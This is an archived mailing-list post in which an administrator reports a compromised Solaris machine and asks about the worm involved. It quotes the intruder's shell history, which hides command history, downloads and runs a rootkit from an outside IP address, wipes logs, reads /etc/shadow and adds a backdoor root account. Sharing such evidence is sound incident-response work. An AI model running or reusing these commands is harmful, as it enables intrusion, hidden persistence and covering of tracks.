Rootkit attack?
��Hello, managers,
At a remote site with an old solaris, we had a problem being unable to
connect through telnet to an old Solaris box (connection, welcome
message, but immediate cutoff before being able to enter login) and the
user at the other end had strange behaviour when trying to connect on
CDE. He could connect through failsafe, though.
After investigation, here's what we found in .sh_history
************************
unset HISTFILE;id;uname -a;uptime;
unset REMOTEHOST
cd /tmp
ls
wget
ps -fe
ftp 202.198.192.125
chmod 777 wget
mv wget /usr/bin/
wget
wget http://62.211.68.12/killoloz/bads.tar
tar -xvf bads.tar
w
cd bads
./setup
ls
cd /usr/lib/libX.a
./wipe .
ls
cd /tmp
ls
rm bads.tar
cat /etc/hosts
cat /etc/shadow
/sbin/ifconfig -a
ps -fe
cat /etc/shadow
echo "nobay:XkhkVD0krghB2:12664::::::" >> /etc/shadow
cat /etc/passwd
echo "nobay:x:0:1::/:/sbin/sh" >> /etc/passwd
exit
************************
In shadow and passwd, there was effectively this entry for nobay.
http://62.211.68.12/ is an Italian meeting site. There's effectively
this bads.tar file in the specified folder.
ftp 202.198.192.125 goes on a solaris8 machine.
Thebox is offline now, the entries deleted, and the matter investigated,
since it's been compromised. However, I can't find any infos on this
worm. Anyone had any experience? If verified, to which authority should
I mention the attack?
Rami
_____________________________________________________________________
Envie de discuter gratuitement avec vos amis ?
Tilichargez Yahoo! Messenger http://yahoo.ifrance.com
_______________________________________________
sunmanagers mailing list
sunmanagers@sunmanagers.org
http://www.sunmanagers.org/mailman/listinfo/sunmanagers
This archive was generated by hypermail 2.1.7
: Wed Apr 09 2008 - 23:30:06 EDT